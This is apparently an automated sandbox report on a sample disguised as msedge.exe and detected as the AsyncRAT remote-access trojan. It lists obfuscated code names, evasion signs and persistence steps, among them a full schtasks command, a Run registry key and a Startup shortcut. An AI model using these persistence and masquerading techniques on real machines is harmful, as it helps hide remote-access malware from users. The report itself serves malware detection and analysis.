Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\msedge.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Source: C:\Users\user\Desktop\msedge.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Memory allocated: 1A9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1A430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1A730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1AEA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1AA20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Memory allocated: 1B200000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598860	Jump to behavior
